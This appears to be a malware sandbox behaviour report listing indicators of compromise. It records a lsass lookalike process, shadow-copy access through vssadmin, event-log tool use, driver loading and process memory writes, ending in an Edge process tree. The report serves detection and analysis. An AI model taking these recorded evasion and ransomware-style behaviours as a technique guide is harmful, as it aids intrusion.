\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1sass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7428 cmd.exe 6796 PING.EXE -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 3164 wevtutil.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 11172 vssadmin.exe 6596 vssadmin.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856681605938755" chrome.exe -
Modifies registry class 31 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\InprocServer32 Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\FLAGS Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\0\win64 Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3} Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\FLAGS\ = "0" Process not Found Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ 7zG.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\PfShellExtension.DLL Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\UnLockerMenu Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\UnLockerMenu Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ 7zG.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\PfShellExtension.DLL\AppID = "{59A55EF0-525F-4276-AB62-8F7E5F230399}" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\InprocServer32\ = "C:\\Program Files (x86)\\IObit\\IObit Unlocker\\IObitUnlockerExtension.dll" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\ = "PfShellExtension 1.0 Type Library" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\0 Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\HELPDIR Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}" Process not Found Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE} Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{59A55EF0-525F-4276-AB62-8F7E5F230399}\ = "PfShellExtension" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\ = "UnLockerMenu Class" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\InprocServer32\ThreadingModel = "Apartment" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\UnLockerMenu Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\IObit\\IObit Unlocker" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{59A55EF0-525F-4276-AB62-8F7E5F230399} Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0 Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\0\win64\ = "C:\\Program Files (x86)\\IObit\\IObit Unlocker\\IObitUnlockerExtension.dll" Process not Found -
Modifies registry key 1 TTPs 3 IoCs
pid Process 11788 Process not Found 2376 Process not Found 8552 Process not Found -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6796 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2068 WINWORD.EXE 2068 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4252 msedge.exe 4252 msedge.exe 3168 msedge.exe 3168 msedge.exe 1848 identity_helper.exe 1848 identity_helper.exe 5572 chrome.exe 5572 chrome.exe 5440 msedge.exe 5440 msedge.exe 5440 msedge.exe 5440 msedge.exe 5152 msedge.exe 5152 msedge.exe 5624 chrome.exe 5624 chrome.exe 5624 chrome.exe 5624 chrome.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 7752 unlocker.tmp 7752 unlocker.tmp 3036 1sass.exe 3036 1sass.exe 8080 loader.exe 8080 loader.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe 3036 1sass.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4868 7zG.exe 6484 MouseLock.exe -
Suspicious behavior: LoadsDriver 33 IoCs
pid Process 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 3904 mssql.exe 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 43 IoCs
pid Process 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe Token: SeShutdownPrivilege 5572 chrome.exe Token: SeCreatePagefilePrivilege 5572 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 5572 chrome.exe 6172 SearchHost.exe 8080 loader.exe 8080 loader.exe 8080 loader.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe 3168 msedge.exe -
Suspicious use of SetWindowsHookEx 25 IoCs
pid Process 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 2068 WINWORD.EXE 3684 mssql2.exe 3904 mssql.exe 3684 mssql2.exe 3904 mssql.exe 6172 SearchHost.exe 3904 mssql.exe 10600 Process not Found 10600 Process not Found 10600 Process not Found 10600 Process not Found 9524 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3168 wrote to memory of 2072 3168 msedge.exe 85 PID 3168 wrote to memory of 2072 3168 msedge.exe 85 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 208 3168 msedge.exe 86 PID 3168 wrote to memory of 4252 3168 msedge.exe 87 PID 3168 wrote to memory of 4252 3168 msedge.exe 87 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 PID 3168 wrote to memory of 4892 3168 msedge.exe 88 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection Process not Found -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://melbet.com1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffeac6946f8,0x7ffeac694708,0x7ffeac6947182⤵PID:2072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:22⤵PID:208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:82⤵PID:4892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵PID:2376
-
-
